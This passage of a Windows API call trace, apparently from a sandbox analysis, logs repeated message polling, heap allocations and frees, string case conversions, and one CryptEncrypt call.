out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.419] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0204.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0204.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0204.419] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.420] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0204.420] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.420] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.421] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0204.421] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.421] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0204.421] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.421] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.421] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.421] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.421] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0204.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.422] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.422] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0204.422] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0204.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.422] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0204.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.422] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0204.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0204.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.427] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0204.427] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0204.427] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.427] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0204.427] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0204.427] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0204.428] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0204.428] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.428] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0204.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0204.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.429] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0204.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0204.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01d0 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0204.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0204.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0204.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0204.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0204.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: 